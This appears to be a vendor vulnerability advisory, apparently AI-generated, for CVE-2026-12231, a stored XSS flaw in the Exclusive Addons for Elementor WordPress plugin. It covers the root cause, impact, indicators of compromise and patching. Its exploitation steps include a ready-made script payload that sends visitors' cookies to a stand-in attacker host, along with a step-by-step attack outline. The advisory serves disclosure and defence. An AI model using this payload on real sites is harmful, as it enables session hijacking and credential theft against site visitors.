CVE-2026-12231
WordPress Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-12231 is a Stored Cross-Site Scripting (XSS) vulnerability in the Exclusive Addons for Elementor plugin for WordPress, affecting all versions up to and including 2.7.9.8. The flaw exists in the exad_infobox_image parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with Contributor-level access or above to inject arbitrary web scripts into pages. It was published on August 2, 2026, with a patch made available the same day. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

Détails techniques

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), stemming from the plugin's failure to properly sanitize user-supplied input in the exad_infobox_image parameter and escape it before rendering in HTML output. The vulnerable code is located in the plugin's infobox.php file (lines 975, 1019–1095, and 1082), where attacker-controlled values are written directly into the page without adequate filtering. Exploitation requires only network access and a low-privilege authenticated account (Contributor or above), with no user interaction needed and a changed scope, meaning the injected script can affect users beyond the attacker's own session (GitHub Advisory, WordPress Trac).

Impact

Successful exploitation allows an authenticated attacker to persistently inject malicious JavaScript into WordPress pages, which executes in the browsers of all users who visit the affected pages. This can result in session token theft, credential harvesting, unauthorized actions performed on behalf of victims (including administrators), and modification of page content. While availability is not directly impacted, the confidentiality and integrity risks extend to all site visitors, including privileged users (GitHub Advisory, Wordfence).

Étapes d’exploitation

  1. Reconnaissance: Identify WordPress sites running the Exclusive Addons for Elementor plugin at version 2.7.9.8 or earlier, using tools like WPScan or by inspecting plugin directories.
  2. Obtain Contributor access: Register or compromise an account with at least Contributor-level privileges on the target WordPress site.
  3. Navigate to the Infobox element: In the WordPress editor (Elementor), add or edit a page containing the Infobox widget provided by the Exclusive Addons plugin.
  4. Inject malicious payload: Supply a crafted XSS payload (e.g., "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the exad_infobox_image parameter, which is not properly sanitized.
  5. Publish the page: Save and publish the page containing the injected content.
  6. Trigger execution: When any user (including administrators) visits the affected page, the injected script executes in their browser, enabling session hijacking, credential theft, or further attacks (GitHub Advisory, Wordfence).

Indicateurs de compromis

  • Logs: WordPress access logs showing POST requests to page/post edit endpoints by Contributor-level accounts containing unusual script tags or encoded JavaScript in the exad_infobox_image field.
  • File System: Unexpected or recently modified pages/posts in the WordPress database containing <script> tags or JavaScript event handlers within Infobox widget content.
  • Network: Outbound requests from victim browsers to unknown external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from pages using the Exclusive Addons Infobox widget.
  • Application: Presence of encoded payloads (e.g., %3Cscript%3E, javascript:, onerror=) in stored post meta values associated with the exad_infobox_image parameter in the WordPress database (wp_postmeta table).

Atténuation et solutions de contournement

Update the Exclusive Addons for Elementor plugin to a version beyond 2.7.9.8, as a patch was released on August 2, 2026 (changeset 3583929). As an interim measure, restrict Contributor-level and above access to only trusted users, and implement Content Security Policy (CSP) headers to limit inline script execution. Administrators should audit recent content modifications for injected scripts and review accounts with Contributor access (WordPress Trac, Wordfence).

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté WordPress Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-12231MEDIUM6.4
  • exclusive-addons-for-elementor
NonOuiAug 02, 2026
CVE-2026-16540NONEN/A
  • simply-schedule-appointments
NonOuiAug 02, 2026
CVE-2026-16292NONEN/A
  • nmedia-user-file-uploader
NonNonAug 02, 2026
CVE-2026-16291NONEN/A
  • profilegrid-user-profiles-groups-and-communities
NonOuiAug 02, 2026
CVE-2026-16285NONEN/A
  • woo-product-attachment
NonOuiAug 02, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités